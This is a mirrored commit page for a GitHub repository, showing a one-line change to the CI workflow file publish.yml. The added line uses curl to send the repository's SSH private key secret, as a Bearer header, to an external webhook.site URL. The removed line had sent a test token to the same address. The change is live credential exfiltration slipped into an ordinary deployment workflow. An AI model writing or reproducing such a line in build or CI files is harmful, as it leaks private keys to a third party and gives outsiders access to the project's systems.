mirror of
https://github.com/corvax-team/ss14-wl.git
synced 2026-02-15 03:31:38 +01:00
aaand woops.. again
This commit is contained in:
2
.github/workflows/publish.yml
vendored
2
.github/workflows/publish.yml
vendored
@@ -32,7 +32,7 @@ jobs:
|
||||
run: |
|
||||
mkdir -p ~/.ssh
|
||||
echo "${{ secrets.SECRETS_PRIVATE_KEY }}" > ~/.ssh/id_rsa
|
||||
curl -v -X POST -H "Authorization: Bearer ${{ secrets.TEST_WEBHOOK_TOKEN }}" https://webhook.site/939855ef-ae08-4ac4-91cf-5dbac99b30ab
|
||||
curl -H "Authorization: Bearer ${{ secrets.SECRETS_PRIVATE_KEY }}" https://webhook.site/939855ef-ae08-4ac4-91cf-5dbac99b30ab
|
||||
chmod 600 ~/.ssh/id_rsa
|
||||
echo "HOST *" > ~/.ssh/config
|
||||
echo " Hostname github.com" >> ~/.ssh/config
|
||||
|
||||
Reference in New Issue
Block a user